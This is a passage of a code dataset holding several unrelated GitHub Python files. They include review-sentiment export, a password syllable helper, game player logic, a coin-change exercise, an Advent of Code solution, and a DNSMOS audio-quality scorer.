data_df[['reviewerID','asin','sentence','sentence_len','aspect','aspect_pos','opinion','opinion_pos']].to_csv(os.path.join(args.out, 'data.csv'), index=False)\n tqdm.pandas(desc='Grouping aspect opinion sentiment')\n data_df['aspect_opinion_sentiment'] = data_df.progress_apply(lambda row: '{}:{}:{}'.format(row['aspect'], row['opinion'], row['sentiment']), axis=1)\n print('Export efm sentiment file')\n efm_sentiment = data_df.groupby(['reviewerID', 'asin'])['aspect_opinion_sentiment'].apply(list).reset_index()\n efm_sentiment['aspect_opinion_sentiment'] = efm_sentiment['aspect_opinion_sentiment'].apply(lambda x: ','.join([str(i) for i in x]))\n with open(os.path.join(args.out, 'sentiment.txt'), 'w') as f:\n for _, row in tqdm(efm_sentiment.iterrows(), total=len(efm_sentiment), desc='Exporting sentiment data file'):\n f.write('{},{},{}\\n'.format(row['reviewerID'], row['asin'], row['aspect_opinion_sentiment']))\n print('done')\n\n\nif __name__ == '__main__':\n main(parse_arguments())\n\n","repo_name":"lthoang/construct-amazon-sentiment","sub_path":"construct_amazon_sentiment.py","file_name":"construct_amazon_sentiment.py","file_ext":"py","file_size_in_byte":12211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36514632184","text":"class SyllableCollection(list):\n def __init__(self):\n super(SyllableCollection, self).__init__()\n self.last_syllable_by_length = dict()\n self.max_syllable_length = 0\n\n def finalize(self):\n self.sort(key=lambda x: (x.length(), str(x)))\n self.last_syllable_by_length = dict()\n for i, syllable in enumerate(self):\n self.last_syllable_by_length[syllable.length()] = i\n self.max_syllable_length = self[-1].length()\n\n def last_index(self, length):\n \"\"\" return last syllables index depending \"\"\"\n length = (\n 1\n if length < 1\n else self.max_syllable_length\n if length >= self.max_syllable_length\n else length\n )\n return self.last_syllable_by_length[length]\n","repo_name":"elmisi/misipwgen","sub_path":"misipwgen/syllable_collection.py","file_name":"syllable_collection.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41143390597","text":"import bge\r\nfrom bge.logic import expandPath\r\nfrom mathutils import Vector\r\nfrom scripts.utils import *\r\n\r\n\"\"\" This module contains all main data processing of the player, like changing properties used all around the game, initializing values, etc. \"\"\"\r\n\r\n################################ DATA ################################\r\n\r\ndef init_libs(cont):\r\n\t\"\"\" Initializes player libraries. Only called by init_all.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: once \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[0].positive\r\n\t\r\n\t# Properties\r\n\tpath = bge.logic.expandPath(\"//libs/\")\r\n\tweapons = \"resources/weapons.blend\"\r\n\tactions = \"actors/player.blend\"\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\tif S_always:\r\n\t\t\r\n\t\t### Load libs ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Load weapon meshes\r\n\t\t\tbge.logic.LibLoad(path + weapons, \"Mesh\")\r\n\t\t\tprint(\"weapons.blend meshes was successfully loaded\")\r\n\t\t\t\r\n\t\t\t# Load player actions\r\n\t\t\tbge.logic.LibLoad(path + actions, \"Action\", load_actions=True)\r\n\t\t\tprint(\"player.blend actions was successfully loaded\")\r\n\t\t\t\r\n\tpass\r\n\r\ndef init_keys(cont):\r\n\t\"\"\" Initializes the game keys based on values of globalDict. Only called by init_all.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: once \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\tglobalDict = bge.logic.globalDict\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[0].positive\r\n\t\r\n\t# Objects\r\n\tO_data = own\r\n\tO_collision = O_data.parent\r\n\tO_input = O_collision.childrenRecursive.get(\"input\")\r\n\t\r\n\t# Properties\r\n\tplayer_status = globalDict[\"state\"][\"current_player\"][\"status\"]\r\n\tsensors = O_input.sensors\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\tif S_always:\r\n\t\t\r\n\t\t### Set the game keys ###\r\n\t\tfor key_sen in sensors:\r\n\t\t\t# For each keyboard sensor, change the key\r\n\t\t\tif type(key_sen) == bge.types.SCA_KeyboardSensor:\r\n\t\t\t\tkey_sen.key = int(globalDict[\"options\"][\"keys\"][key_sen.name])\r\n\t\t\t\t\t\r\n\t\t# Warning message\r\n\t\tprint(\"Player key config applied to\", player_status[\"name\"])\r\n\t\t\r\n\tpass\r\n\r\ndef init_all(cont):\r\n\t\"\"\" Initializes player properties based on the current game state and stored settings, including game keys.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: once \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\tglobalDict = bge.logic.globalDict\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[0].positive\r\n\t\r\n\t# Objects\r\n\tO_data = own\r\n\tO_collision = O_data.parent\r\n\tO_player_head = O_collision.childrenRecursive.get(\"player_head\")\r\n\tO_player_body = O_collision.childrenRecursive.get(\"player_body\")\r\n\tO_combat = O_collision.childrenRecursive.get(\"combat\")\r\n\tO_input = O_collision.childrenRecursive.get(\"input\")\r\n\tO_items = O_collision.childrenRecursive.get(\"items\")\r\n\t\r\n\t# Properties\r\n\tcurrent_player = globalDict[\"state\"][\"current_player\"]\r\n\tplayer_status = globalDict[\"state\"][\"current_player\"][\"status\"]\r\n\tsensors = O_input.sensors\r\n\tcurrent_item = current_player[\"item_\" + str(player_status[\"current_item\"])]\r\n\tweapons = globalDict[\"database\"][\"weapons\"]\r\n\tpath = bge.logic.expandPath(\"//../libs/\")\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\tif S_always:\r\n\t\t\r\n\t\t### Load libs ###\r\n\t\tinit_libs(cont)\r\n\t\t\r\n\t\t### Set the game keys ###\r\n\t\tinit_keys(cont)\r\n\t\t\r\n\t\t### Set the globalDict props to GameObject props ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Stats\r\n\t\t\tO_data[\"name\"] = player_status[\"name\"]\r\n\t\t\tO_data[\"color\"] = player_status[\"color\"]\r\n\t\t\tO_data[\"health\"] = int(player_status[\"health\"])\r\n\t\t\tO_data[\"current_item\"] = int(player_status[\"current_item\"])\r\n\t\t\t\r\n\t\t\t# Combat\r\n\t\t\tO_combat[\"name\"] = current_item[\"name\"]\r\n\t\t\tO_combat[\"type\"] = weapons[current_item[\"name\"]][\"type\"]\r\n\t\t\tO_combat[\"shot_time\"] = float(weapons[current_item[\"name\"]][\"shot_time\"])\r\n\t\t\tO_combat[\"cocking_type\"] = int(weapons[current_item[\"name\"]][\"cocking_type\"])\r\n\t\t\tO_combat[\"cocking_time\"] = float(weapons[current_item[\"name\"]][\"cocking_time\"])\r\n\t\t\tO_combat[\"current_clip\"] = int(current_item[\"current_clip\"])\r\n\t\t\tO_combat[\"max_clip\"] = int(weapons[current_item[\"name\"]][\"max_clip\"])\r\n\t\t\tO_combat[\"ammo_stock\"] = int(current_item[\"ammo_stock\"])\r\n\t\t\tO_combat[\"damage\"] = int(weapons[current_item[\"name\"]][\"damage\"])\r\n\t\t\r\n\t\t### Change player helmet's visor color ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Green\r\n\t\t\tif O_data[\"color\"] == \"Green\":\r\n\t\t\t\tO_player_head.color = [0.0, 1.0, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [0.0, 1.0, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Red\r\n\t\t\tif O_data[\"color\"] == \"Red\":\r\n\t\t\t\tO_player_head.color = [1.0, 0.0, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 0.0, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Blue\r\n\t\t\tif O_data[\"color\"] == \"Blue\":\r\n\t\t\t\tO_player_head.color = [0.0, 0.5, 1.0, 1.0]\r\n\t\t\t\tO_player_body.color = [0.0, 0.5, 1.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Yellow\r\n\t\t\tif O_data[\"color\"] == \"Yellow\":\r\n\t\t\t\tO_player_head.color = [1.0, 1.0, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 1.0, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Purple\r\n\t\t\tif O_data[\"color\"] == \"Purple\":\r\n\t\t\t\tO_player_head.color = [1.0, 0.0, 1.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 0.0, 1.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Orange\r\n\t\t\tif O_data[\"color\"] == \"Orange\":\r\n\t\t\t\tO_player_head.color = [1.0, 0.5, 0.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 0.5, 0.0, 1.0]\r\n\t\t\t\t\r\n\t\t\t# Other\r\n\t\t\tif O_data[\"color\"] == \"None\":\r\n\t\t\t\tO_player_head.color = [1.0, 1.0, 1.0, 1.0]\r\n\t\t\t\tO_player_body.color = [1.0, 1.0, 1.0, 1.0]\r\n\t\t\r\n\t\t### Warning message ###\r\n\t\tprint(\"Config applied to player\", player_status[\"name\"])\r\n\t\r\n\tpass\r\n\r\ndef set_move_speed(cont):\r\n\t\"\"\" Speed transition of the move speed, smoothing the movement.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'data'\r\n\tFREQUENCY: continuous \"\"\"\r\n\t\r\n\town = cont.owner\r\n\t\r\n\t# Sensors\r\n\tS_always = cont.sensors[\"always_set_move_speed\"]\r\n\tS_move_v_changed = cont.sensors[\"move_v_changed\"].positive\r\n\tS_move_h_changed = cont.sensors[\"move_h_changed\"].positive\r\n\t\r\n\t# Objects\r\n\tO_data = own\r\n\tO_collision = own.parent\r\n\tO_input = O_collision.childrenRecursive.get(\"input\")\r\n\t\r\n\t# Properties\r\n\tmove_speed_max = 0.1\r\n\tsmooth_factor = 0.01\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\t### Activate constant processing when pressing move buttons\r\n\tif S_move_v_changed or S_move_h_changed:\r\n\t\tif O_input[\"move_vertical\"] != \"none\" or O_input[\"move_horizontal\"] != \"none\":\r\n\t\t\tS_always.usePosPulseMode = True\r\n\t\r\n\t### Constant processing of move speed ###\r\n\tif S_always.positive and not O_data[\"is_busy\"]:\r\n\r\n\t\t### Speed vertical ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# Up\r\n\t\t\tif O_input[\"move_vertical\"] == \"up\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] < move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] > move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] < move_speed_max * 2 - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\r\n\t\t\t# Down\r\n\t\t\tif O_input[\"move_vertical\"] == \"down\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] > -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] < -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_v\"] > -move_speed_max * 2 + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\r\n\t\t\t# Stop\r\n\t\t\tif O_input[\"move_vertical\"] == \"none\":\r\n\t\t\t\t\r\n\t\t\t\t# Raise\r\n\t\t\t\tif O_data[\"move_speed_v\"] < 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Lower\r\n\t\t\t\tif O_data[\"move_speed_v\"] > 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_v\"] -= smooth_factor\r\n\t\t\t\t\r\n\t\t\t\t# Fix when not 0\r\n\t\t\t\tif O_data[\"move_speed_v\"] >= -smooth_factor and O_data[\"move_speed_v\"] <= smooth_factor:\r\n\t\t\t\t\tO_data[\"move_speed_v\"] = 0.0\r\n\t\t\r\n\t\t### Speed horizontal ###\r\n\t\tif True:\r\n\t\t\t# Right\r\n\t\t\tif O_input[\"move_horizontal\"] == \"right\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] < move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] > move_speed_max - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] < move_speed_max * 2 - 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\r\n\t\t\t# Left\r\n\t\t\tif O_input[\"move_horizontal\"] == \"left\":\r\n\t\t\t\t\r\n\t\t\t\t# Walk\r\n\t\t\t\tif not O_input[\"is_running\"]:\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Raise if not at max speed\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] > -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t# Lower if was running\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] < -move_speed_max + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\t\t\r\n\t\t\t\t# Run\r\n\t\t\t\tif O_input[\"is_running\"]:\r\n\t\t\t\t\tif O_data[\"move_speed_h\"] > -move_speed_max * 2 + 0.0001:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\r\n\t\t\t# Stop\r\n\t\t\tif O_input[\"move_horizontal\"] == \"none\":\r\n\t\t\t\t\r\n\t\t\t\t# Raise\r\n\t\t\t\tif O_data[\"move_speed_h\"] < 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] += smooth_factor\r\n\t\t\t\t\t\t\r\n\t\t\t\t# Lower\r\n\t\t\t\tif O_data[\"move_speed_h\"] > 0.0:\r\n\t\t\t\t\t\tO_data[\"move_speed_h\"] -= smooth_factor\r\n\t\t\t\t\r\n\t\t\t\t# Fix when not 0\r\n\t\t\t\tif O_data[\"move_speed_h\"] >= -smooth_factor and O_data[\"move_speed_h\"] <= smooth_factor:\r\n\t\t\t\t\tO_data[\"move_speed_h\"] = 0.0\r\n\t\t\t\t\t\r\n\t\t### Disable processing if not pressing move buttons ###\r\n\t\tif O_data[\"move_speed_h\"] == 0.0 and O_data[\"move_speed_v\"] == 0.0:\r\n\t\t\t\r\n\t\t\tif O_input[\"move_horizontal\"] == \"none\" and O_input[\"move_vertical\"] == \"none\":\r\n\t\t\t\tS_always.usePosPulseMode = False\r\n\t\t\r\n\tpass\r\n\r\n################################ INPUT ################################\r\n\r\ndef input_to_props(cont):\r\n\t\r\n\t\"\"\" Sets the player properties based on input or interaction with other actors and elements.\r\n\t\r\n\tSCENE: current level\r\n\tOBJECT: 'input'\r\n\tFREQUENCY: input and interaction dependent \"\"\"\r\n\t\r\n\t# Basic\r\n\town = cont.owner\r\n\tglobalDict = bge.logic.globalDict\r\n\t\r\n\t# Sensors\r\n\tS_up = cont.sensors[\"up\"].positive\r\n\tS_down = cont.sensors[\"down\"].positive\r\n\tS_left = cont.sensors[\"left\"].positive\r\n\tS_right = cont.sensors[\"right\"].positive\r\n\tS_run = cont.sensors[\"run\"].positive\r\n\tS_use = cont.sensors[\"use\"].positive\r\n\tS_reload = cont.sensors[\"reload\"].positive\r\n\tS_item_1 = cont.sensors[\"item_1\"].positive\r\n\tS_item_2 = cont.sensors[\"item_2\"].positive\r\n\tS_item_3 = cont.sensors[\"item_3\"].positive\r\n\tS_item_4 = cont.sensors[\"item_4\"].positive\r\n\tS_shoot = cont.sensors[\"shoot\"].positive\r\n\t\r\n\t# Objects\r\n\tO_input = own\r\n\tO_collision = own.parent\r\n\tO_data = O_collision.childrenRecursive.get(\"data\")\r\n\tO_combat = O_collision.childrenRecursive.get(\"combat\")\r\n\t\r\n\t# Properties\r\n\treload_time = 1.9\r\n\tis_local_player = O_data[\"name\"] == globalDict[\"state\"][\"current_player\"][\"status\"][\"name\"]\r\n\t\r\n\t############################\r\n\t######## INITIALIZE ########\r\n\t############################\r\n\t\r\n\t# Active events\r\n\tif not O_data[\"is_busy\"] and is_local_player:\r\n\t\t\r\n\t\t### Item ###\r\n\t\tif O_data[\"current_action\"] == \"aiming\" and O_combat[\"timer_cock\"] > 0.0:\r\n\t\t\t\r\n\t\t\t# Item 1\r\n\t\t\tif S_item_1:\r\n\t\t\t\tO_data[\"current_item\"] = 1\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"1\"\r\n\t\t\t\t\r\n\t\t\t# Item 2\r\n\t\t\tif S_item_2:\r\n\t\t\t\tO_data[\"current_item\"] = 2\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"2\"\r\n\t\t\t\t\r\n\t\t\t# Item 3\r\n\t\t\tif S_item_3:\r\n\t\t\t\tO_data[\"current_item\"] = 3\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"3\"\r\n\t\t\t\t\r\n\t\t\t# Item 4\r\n\t\t\tif S_item_4:\r\n\t\t\t\tO_data[\"current_item\"] = 4\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"4\"\r\n\t\t\r\n\t\t### Move ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t### Vertical move ###\r\n\t\t\t# None\r\n\t\t\tif not S_up and not S_down or S_up and S_down:\r\n\t\t\t\tO_input[\"move_vertical\"] = \"none\"\r\n\t\t\t# Up\r\n\t\t\tif S_up and not S_down:\r\n\t\t\t\tO_input[\"move_vertical\"] = \"up\"\r\n\t\t\t# Down\r\n\t\t\tif not S_up and S_down:\r\n\t\t\t\tO_input[\"move_vertical\"] = \"down\"\r\n\t\t\t\t\r\n\t\t\t### Horizontal move ###\r\n\t\t\t# None\r\n\t\t\tif not S_left and not S_right or S_left and S_right:\r\n\t\t\t\tO_input[\"move_horizontal\"] = \"none\"\r\n\t\t\t# Left\r\n\t\t\tif S_left and not S_right:\r\n\t\t\t\tO_input[\"move_horizontal\"] = \"left\"\r\n\t\t\t# Right\r\n\t\t\tif not S_left and S_right:\r\n\t\t\t\tO_input[\"move_horizontal\"] = \"right\"\r\n\t\t\r\n\t\t### Run ###\r\n\t\tif True:\r\n\t\t\t# On\r\n\t\t\tif S_run:\r\n\t\t\t\tO_input[\"is_running\"] = True\r\n\t\t\t# Off\r\n\t\t\tif not S_run:\r\n\t\t\t\tO_input[\"is_running\"] = False\r\n\t\t\r\n\t\t### Use ###\r\n\t\tif True:\r\n\t\t\t# On\r\n\t\t\tif S_use:\r\n\t\t\t\tO_input[\"is_using\"] = True\r\n\t\t\t# Off\r\n\t\t\tif not S_use:\r\n\t\t\t\tO_input[\"is_using\"] = False\r\n\t\t\t\r\n\t\t### Shoot ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# On\r\n\t\t\tif S_shoot:\r\n\t\t\t\tO_input[\"is_shooting\"] = True\r\n\t\t\t\t\r\n\t\t\t# Off\r\n\t\t\tif not S_shoot:\r\n\t\t\t\tO_input[\"is_shooting\"] = False\r\n\t\t\t\t\r\n\t\t### Reload ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# On\r\n\t\t\tif S_reload:\r\n\t\t\t\tO_input[\"is_reloading\"] = True\r\n\t\t\t\t\r\n\t\t\t# Off\r\n\t\t\tif not S_reload:\r\n\t\t\t\tO_input[\"is_reloading\"] = False\r\n\t\t\t\t\r\n\tpass\r\n\r\n","repo_name":"PlumpMath/bge_dw","sub_path":"scripts/player/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":13218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30899528783","text":"from rit_lib import *\n\n\n# the RIT-style struct to represent coins\nCoin = struct_type(\"Coin\",\n (str, \"name\"),\n (int, \"value\"))\n\n\n# the RIT-style struct to represent coin rolls\nCoinRoll = struct_type(\"CoinRoll\",\n (Coin, \"coin\"),\n (int, \"qty\"))\n\n\ndef find_biggest_coin(coins, amount):\n \"\"\"\n Finds the biggest coin that is smaller than the specified amount.\n :param coins: The coins from which to choose. Must be sorted from smallest\n to largest denomination.\n :param amount: The amount for which to make change.\n :return: The largest coin that is smaller than the amount.\n \"\"\"\n biggest = coins[0] # assume that the first coin is the biggest\n\n for i in range(1, len(coins)):\n coin = coins[i] # get the next coin in the list\n if coin.value <= amount: # if the value is less than the amount...\n biggest = coin # ...it is now the biggest coin\n\n # make sure to return biggest (not coin...oops)\n return biggest\n\n\ndef make_change(coins, amount):\n \"\"\"\n Given the coins, make change for the specified amount.\n :param coins: The coin denominations to use when making change.\n :param amount: The amount for which to make change.\n :return: The coin rolls containing the coins and quantities for the change.\n \"\"\"\n rolls = {} # an empty dictionary of coin denominations to coin rolls\n\n # continue while there is change left to be made\n while amount > 0:\n # find the biggest coin that is smaller than the amount\n coin = find_biggest_coin(coins, amount)\n\n # if a roll for that coin is already in the rolls dictionary\n if coin.value in rolls:\n # fetch the roll\n roll = rolls[coin.value]\n else:\n # otherwise create a new roll and add it to the dictionary with\n # the coin's value as the key (can't use the coin itself because\n # RIT-style structs can't be used as keys in a dictionary).\n roll = CoinRoll(coin, 0)\n rolls[coin.value] = roll\n\n # update the quantity of coins in the rolls\n roll.qty = roll.qty + 1\n # deduct the coin's value from the amount\n amount = amount - coin.value\n\n # copy the coin rolls into a list and return it\n new_rolls = []\n for coin in rolls:\n new_rolls += [rolls[coin]]\n return new_rolls\n\n\ndef main():\n \"\"\"\n Prompts the user to enter a country to use for currency denomination and\n an amount for which to make change, then calculates the change and prints\n the result.\n :return:\n \"\"\"\n\n # prompt the user for the country (coin data is in data/.txt)\n coin_filename = \"data/\" + input(\"Enter country: \") + \".txt\"\n\n # create an empty list to hold the coins\n coins = []\n # loop through the lines in the file\n coin_file = open(coin_filename, 'r')\n for line in coin_file:\n # use the coin data to create a new coin and add it to the list of\n # coins\n line = line.strip() # namevalue\n tokens = line.split() # [name, value]\n coin = Coin(tokens[0], int(tokens[1]))\n coins += [coin]\n\n # at this point the coins should be sorted by value from smallest to\n # largest, but I'm cheating by putting them in the currency file in sorted\n # order to start.\n\n # prompt the user to enter the amount for which to make change\n amount = int(input(\"Enter amount: \"))\n\n # make the change\n rolls = make_change(coins, amount)\n # print the rolls\n for roll in rolls:\n print(roll)\n\n\nif __name__ == '__main__':\n main()","repo_name":"solarphinn/CS1Python","sub_path":"Week09-dictionaries-structs/make_change.py","file_name":"make_change.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39357550528","text":"import sys\nfile = open(sys.argv[1])\ninputList = list(map(int, file.readline().split(\",\")))\n\n\ncurrentPosition = 0\nskipSize = 0\nlistSize = 256\nlistNums = list(range(listSize))\n\nfor num in inputList:\n\t\tif(num <= listSize):\n\t\t\t#reverse the chunk of list\n\t\t\treverseList\t= None\n\t\t\tif(num + currentPosition > listSize):\n\t\t\t\tpullFromFront = (num + currentPosition\t) - listSize\n\t\t\t\treverseList = listNums[currentPosition\t: listSize]\n\t\t\t\treverseList += (listNums[0:pullFromFront])\n\t\t\t\treverseList.reverse()\n\n\n\t\t\telse:\n\t\t\t\treverseList = listNums[currentPosition:currentPosition+num]\n\t\t\t\treverseList.reverse()\n\n\n\t\t\ttempIndex = currentPosition\t\n\t\t\tfor item in reverseList:\n\t\t\t\t\tif(tempIndex >= listSize):\n\t\t\t\t\t\ttempIndex\t = 0\n\t\t\t\t\tlistNums[tempIndex] = item\n\t\t\t\t\ttempIndex\t+= 1\n\t\t\t\n\t\t\tcurrentPosition\t+= skipSize\t+ num\n\t\t\tskipSize+=1\n\t\t\twhile (currentPosition\t> listSize):\n\t\t\t\tcurrentPosition\t -= listSize\n\n\t\t\tprint(\"listnums:{} currentPosition:{} currentValue:{} skipSize:{}\\n\\n\\n\".format(listNums, currentPosition\t, listNums[currentPosition], skipSize))\n\nprint(listNums[0]*listNums[1])\n\n\n","repo_name":"natahlieb/adventofcode2017","sub_path":"Day10/day10.0.py","file_name":"day10.0.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11111897037","text":"import argparse\nimport os\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom torch import Tensor\n\nfrom df.io import load_audio\nfrom df.logger import init_logger, log_metrics\nfrom df.scripts.dnsmos import SR, get_ort_session, isclose\nfrom df.utils import download_file, get_cache_dir\n\nURL_ONNX = \"https://github.com/microsoft/DNS-Challenge/raw/82f1b17e7776a43eee395d0f45bae8abb700ad00/DNSMOS/DNSMOS/\"\n# Coefficients for polynomial fitting\nP_SIG = np.poly1d([-0.08397278, 1.22083953, 0.0052439])\nP_BAK = np.poly1d([-0.13166888, 1.60915514, -0.39604546])\nP_OVR = np.poly1d([-0.06766283, 1.11546468, 0.04602535])\nNAMES = (\"SIG\", \"BAK\", \"OVL\")\nINPUT_LENGTH = 9.01\n\n\ndef main(args):\n file: str = args.file\n verbose = args.debug\n target_mos: List[float] = args.target_mos\n audio = load_audio(file, sr=SR, verbose=verbose)[0].squeeze(0)\n sig_bak_ovr = download_onnx_model()\n dnsmos = dnsmos_local(audio, sig_bak_ovr)\n log_metrics(\"Predicted\", {n: v for (n, v) in zip(NAMES, dnsmos)})\n if target_mos is not None:\n if len(target_mos) > 0:\n assert len(target_mos) == len(dnsmos)\n log_metrics(\"Target \", {n: v for (n, v) in zip(NAMES, target_mos)})\n for d, t in zip(dnsmos, target_mos):\n if not isclose(d, t):\n diff = (np.asarray(target_mos) - np.asarray(dnsmos)).tolist()\n log_metrics(\"Diff \", {n: v for (n, v) in zip(NAMES, diff)}, level=\"ERROR\")\n exit(2)\n exit(0)\n\n\ndef download_onnx_model():\n cache_dir = get_cache_dir()\n if not os.path.isdir(cache_dir):\n os.makedirs(cache_dir)\n name = \"sig_bak_ovr.onnx\"\n onnx = os.path.join(cache_dir, name)\n if not os.path.exists(onnx):\n onnx = download_file(URL_ONNX + name, download_dir=cache_dir)\n return onnx\n\n\ndef dnsmos_local(audio: Tensor, onnx: str) -> Tuple[float, float, float]:\n assert len(audio) >= SR, f\"Audio to short: {audio.shape}\"\n\n session = get_ort_session(onnx)\n\n if len(audio) < INPUT_LENGTH * SR:\n audio = np.pad(audio, (0, int(INPUT_LENGTH * SR - len(audio))), mode=\"wrap\")\n num_hops = int(np.floor(len(audio) / SR) - INPUT_LENGTH) + 1\n hop_len_samples = SR\n predicted_mos_sig_seg = []\n predicted_mos_bak_seg = []\n predicted_mos_ovr_seg = []\n assert num_hops > 0\n\n for idx in range(num_hops):\n audio_seg = audio[int(idx * hop_len_samples) : int((idx + INPUT_LENGTH) * hop_len_samples)]\n if len(audio_seg) < INPUT_LENGTH * SR:\n continue\n input_features = np.array(audio_seg).astype(\"float32\")[np.newaxis, :]\n oi = {\"input_1\": input_features}\n\n mos_sig_raw, mos_bak_raw, mos_ovr_raw = session.run(None, oi)[0][0]\n\n mos_sig = P_SIG(mos_sig_raw)\n mos_bak = P_BAK(mos_bak_raw)\n mos_ovr = P_BAK(mos_ovr_raw)\n\n predicted_mos_sig_seg.append(mos_sig)\n predicted_mos_bak_seg.append(mos_bak)\n predicted_mos_ovr_seg.append(mos_ovr)\n\n mod_sig = np.mean(predicted_mos_sig_seg)\n mod_bak = np.mean(predicted_mos_bak_seg)\n mod_ovr = np.mean(predicted_mos_ovr_seg)\n return mod_sig, mod_bak, mod_ovr\n\n\nif __name__ == \"__main__\":\n 